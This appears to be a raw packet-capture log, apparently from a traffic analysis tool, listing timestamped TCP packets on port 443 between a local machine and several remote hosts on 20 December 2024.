                                                                  Dec 20, 2024 06:19:24.134375095 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.134439945 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.142699003 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.142777920 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.151216984 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.151289940 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.155828953 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.155917883 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.163732052 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.163798094 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.172295094 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.172379971 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.265352964 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.265434980 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.268436909 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.268496037 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.275302887 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.275372028 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.281819105 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.281899929 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.288041115 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.288121939 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.291363001 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.291434050 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.297379971 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.297461033 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.303920031 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.304003000 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.310405970 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.310492992 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.313570976 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.313652992 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.319972992 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.320050001 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.322551012 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.322622061 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.328197956 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.328283072 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.328355074 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.328403950 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.334162951 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.334240913 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.339639902 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.339709044 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.344301939 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.344419956 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.350053072 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.350143909 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.352905035 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.352972031 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.358856916 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.358933926 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.363982916 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.364058971 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.366906881 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.366981030 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.372889042 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.372972012 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.375983953 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.376055002 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.455493927 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.455560923 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.459233046 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.459286928 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.464515924 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.464593887 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.480762959 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.480778933 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.480806112 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.480842113 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.480854988 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.480866909 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.480899096 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.485485077 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.485552073 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.504251957 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.504281998 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.504328012 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.504336119 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.504354000 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.504369974 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.517510891 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.517548084 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.517606974 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.517613888 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.517657042 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.529473066 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.529495955 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.529555082 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.529561996 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.529597044 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.529622078 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.542454958 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.542481899 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.542537928 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.542542934 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.542579889 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.542598963 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.555303097 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.555341959 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.555399895 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.555406094 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.555448055 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.603446007 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.647814035 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.647855997 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.647887945 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.647896051 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.647912979 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.647923946 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.647927999 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.657491922 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.657517910 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.657547951 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.657560110 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.657588959 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.668318033 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.668348074 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.668370962 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.668379068 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.668395042 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.677778959 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.677803993 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.677834034 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.677839994 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.677871943 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.688548088 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.688569069 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.688596010 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.688605070 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.688649893 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.698719978 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.698745012 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.698776960 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.698784113 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.698827028 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.707601070 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.707621098 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.707653999 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.707660913 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.707690001 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.715217113 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.715257883 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.715275049 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.715281963 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.715317011 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.715361118 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.715403080 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.715641975 CET49764443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:24.715656042 CET44349764104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:24.871793032 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:24.871825933 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:24.871889114 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:24.872081041 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:24.872090101 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.089431047 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.089677095 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.089695930 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.091362000 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.091428041 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.092490911 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.092644930 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.092650890 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.092777967 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.139414072 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.139420986 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.185930967 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.517230034 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.561908007 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.637141943 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.637159109 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.637182951 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.637193918 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.637218952 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.637233019 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.637247086 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.637280941 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.637320995 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.751149893 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.751171112 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.751204014 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.751240969 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.751342058 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.751342058 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.751351118 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.751391888 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.791713953 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.791743040 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.791790962 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.791798115 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.791944027 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.791944981 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.917422056 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.917455912 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.917594910 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.917594910 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.917608023 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.917651892 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.945503950 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.945544004 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.945672035 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.945672035 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.945682049 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.945718050 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.957091093 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.957202911 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:26.957307100 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.957307100 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.957587004 CET49767443192.168.2.4151.101.66.137
                                                                  Dec 20, 2024 06:19:26.957604885 CET44349767151.101.66.137192.168.2.4
                                                                  Dec 20, 2024 06:19:27.024137020 CET49765443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:27.067409992 CET44349765104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:27.121927977 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:27.122015953 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:27.122283936 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:27.122392893 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:27.122421980 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:27.353144884 CET44349765104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:27.353360891 CET44349765104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:27.353554010 CET49765443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:27.355175972 CET49765443192.168.2.4104.21.49.70
                                                                  Dec 20, 2024 06:19:27.355237961 CET44349765104.21.49.70192.168.2.4
                                                                  Dec 20, 2024 06:19:27.469475985 CET44349760142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:19:27.469579935 CET44349760142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:19:27.469856024 CET49760443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:19:27.492623091 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:27.492707014 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:27.492794991 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:27.492981911 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:27.493005037 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:27.573854923 CET49760443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:19:27.573887110 CET44349760142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:19:28.330538988 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.331008911 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.331072092 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.332545042 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.332799911 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.333131075 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.333132029 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.333254099 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.385270119 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.385329008 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.432250023 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.713685036 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:28.714168072 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:28.714227915 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:28.715898991 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:28.716113091 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:28.717125893 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:28.717125893 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:28.717422009 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:28.760212898 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:28.760272026 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:28.763125896 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.807060003 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.807060957 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:28.883198977 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.883217096 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.883269072 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.883290052 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.883310080 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.883379936 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.883379936 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.883379936 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.883447886 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.883498907 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.883522034 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.997977972 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.998018980 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.998166084 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.998182058 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.998249054 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:28.998306990 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:28.998306990 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.147706985 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.147735119 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.148044109 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.148106098 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.148195028 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.167340040 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:29.167541981 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:29.167732954 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:29.170825958 CET49772443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:29.170887947 CET4434977235.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:29.174207926 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:29.174258947 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:29.174326897 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:29.174669027 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:29.174680948 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:29.177648067 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.177680016 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.177901030 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.177901030 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.177963972 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.178030968 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.204899073 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.204943895 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.205202103 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.205262899 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.205632925 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.218307972 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.218400002 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:29.218636990 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.218637943 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.218637943 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.525979996 CET49770443192.168.2.4151.101.194.137
                                                                  Dec 20, 2024 06:19:29.526043892 CET44349770151.101.194.137192.168.2.4
                                                                  Dec 20, 2024 06:19:30.390422106 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.390661955 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:30.390670061 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.391813040 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.392155886 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:30.392281055 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:30.392285109 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.392586946 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.447582960 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:30.850281000 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.850501060 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.850532055 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:30.850541115 CET4434977335.190.80.1192.168.2.4
                                                                  Dec 20, 2024 06:19:30.850562096 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:30.850589991 CET49773443192.168.2.435.190.80.1
                                                                  Dec 20, 2024 06:19:43.560628891 CET44349758108.158.75.114192.168.2.4
                                                                  Dec 20, 2024 06:19:43.560725927 CET44349758108.158.75.114192.168.2.4
                                                                  Dec 20, 2024 06:19:43.560784101 CET49758443192.168.2.4108.158.75.114
                                                                  Dec 20, 2024 06:19:43.730803967 CET49758443192.168.2.4108.158.75.114
                                                                  Dec 20, 2024 06:19:43.730844021 CET44349758108.158.75.114192.168.2.4
                                                                  Dec 20, 2024 06:20:15.996260881 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:15.996334076 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:15.996524096 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:15.996758938 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:15.996795893 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:17.693634033 CET44349869142.250.181.132192.168.2.4
